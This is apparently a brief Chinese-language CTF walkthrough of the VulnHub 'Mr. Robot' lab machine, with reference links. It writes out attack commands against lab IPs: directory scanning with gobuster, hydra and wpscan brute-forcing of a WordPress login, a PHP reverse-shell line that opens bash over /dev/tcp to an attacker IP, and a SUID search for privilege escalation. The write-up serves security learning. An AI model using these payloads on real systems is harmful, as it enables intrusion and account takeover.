开局一手netdiscover和nmap
gobuster扫出来的robots和wp
1 | gobuster dir -u http://192.168.0.100 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt |
还拿到了第一个key
fsocity=社会
dir=directory=字典
社会工程学字典。感觉是爆破用的
sort搭配uniq给字典排序and去重
hydra扫描用户
1 | hydra -t 64 -L fsocity-sort.dic -p test 192.168.0.101 http-form-post "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In:Invalid username" |
wpscan爆破密码
1 | wpscan --url http://192.168.0.101/ --api-token xxxx --usernames Elliot --passwords fsocity-sort.dic |
反弹shell
1 | <?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.0.105/1234 0>&1'");?> //写弹shell语句 |
拿到第二个key
md5破解密码and loginMD5破解
1 | find / -perm -u=s -type f 2>/dev/null |
第三个key
其他参考:
1.
https://nwrzd.medium.com/vulnhub-com-mr-robot-1-walkthrough-5119586b2a3f
2.
https://medium.com/@D00MFist/vulnhub-mr-robot-220348146b3b
3.
https://hive.blog/security/@falconspy/mr-robot-vulnhub-walkthrough
4.
https://alpinesecurity.com/blog/mr-robot-walkthrough-vulnhub/
5.
https://www.infosecarticles.com/mr-robot-ctf-1-walkthrough/